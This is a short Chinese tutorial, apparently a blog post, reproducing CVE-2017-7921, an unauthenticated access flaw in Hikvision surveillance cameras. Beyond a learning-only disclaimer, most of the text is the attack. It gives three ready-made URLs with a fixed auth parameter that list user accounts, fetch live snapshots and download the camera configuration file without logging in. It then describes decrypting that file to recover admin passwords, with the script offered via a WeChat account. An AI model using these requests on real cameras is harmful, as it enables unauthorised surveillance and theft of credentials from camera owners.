CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现

注：此教程仅供学习参考，不涉及任何以破坏为目的的违法犯罪，个人行为与作者无关。

一、漏洞描述

        1.这是一个海康威视摄像头后台管理未授权漏洞，通过构造URL可绕过登录查看监控，检索所有用户和配置文件下载，并获取到监控后台管理账号和密码。

二、漏洞复现

1.在web浏览器中输入以下代码来检索用户与用户列

http://摄像头IP地址/Security/users?auth=YWRtaW46MTEK

 2.在没有进行登录的情况下获取监控快照

http://摄像头IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK

3.下载摄像头配置文件

http://摄像头IP地址/System/configurationFile?auth=YWRtaW46MTEK

 4.用python脚本对配置文件进行破解(脚本放在结尾)

5.验证密码是否正确

关注微信公众号菜鸟学渗透后台回复CVE-2017-7921获取脚本 

得点赞+关注，关注微信公众号菜鸟学渗透，有任何问题可以后台私信我！